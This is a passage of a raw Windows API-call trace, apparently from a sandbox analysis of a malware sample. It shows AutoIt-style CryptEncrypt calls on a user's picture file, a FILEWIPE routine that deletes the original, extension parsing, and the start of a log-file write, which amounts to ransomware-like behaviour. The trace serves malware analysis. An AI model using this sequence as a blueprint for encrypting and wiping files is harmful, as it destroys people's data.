lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0041.440] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.445] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.445] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.445] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.445] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.445] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.445] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0041.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0041.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.445] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.445] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0041.445] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.446] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0041.446] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.446] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0041.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0041.446] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.446] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0041.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0041.446] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0041.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.447] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xbaf4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xbb00) returned 1 [0041.447] CharLowerBuffW (in: lpsz="byte[47873]", cchLength=0xb | out: lpsz="byte[47873]") returned 0xb [0041.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.449] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x940b08*, pdwDataLen=0x6ae220*=0xbaf4, dwBufLen=0xbb00 | out: pbData=0x940b08*, pdwDataLen=0x6ae220*=0xbb00) returned 1 [0041.451] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0041.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.451] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0041.451] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.457] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.457] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.458] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.458] CryptDestroyKey (hKey=0x7c2280) returned 1 [0041.458] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.458] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.458] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.458] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.458] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.459] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.459] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.459] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.459] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.459] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0041.459] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0041.459] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.459] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc20e800, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0xfedbce60, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xfedbce60, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0xbaf4, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pIsPeGCNL7-FJt.png", cAlternateFileName="PISPEG~1.PNG")) returned 0x7c2240 [0041.460] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.460] CharLowerBuffW (in: lpsz="byte[47860]", cchLength=0xb | out: lpsz="byte[47860]") returned 0xb [0041.460] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.460] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.460] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.460] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.460] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0041.461] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0041.461] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.461] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.461] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pispegcnl7-fjt.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.462] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.462] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.462] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.462] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.463] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.463] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.463] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.463] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.463] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", lpFilePart=0x0) returned 0x39 [0041.463] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc20e800, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0xfedbce60, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0x186c0b40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbaf4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pIsPeGCNL7-FJt.png", cAlternateFileName="PISPEG~1.PNG")) returned 0x7c2240 [0041.463] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pIsPeGCNL7-FJt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pispegcnl7-fjt.png")) returned 1 [0041.465] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc20e800, ftCreationTime.dwHighDateTime=0x1d5bc9d, ftLastAccessTime.dwLowDateTime=0xfedbce60, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0x186c0b40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xbaf4, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="pIsPeGCNL7-FJt.png", cAlternateFileName="PISPEG~1.PNG")) returned 0 [0041.465] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.465] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.466] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.466] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.466] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.466] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.466] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.467] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.467] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.467] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.467] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), 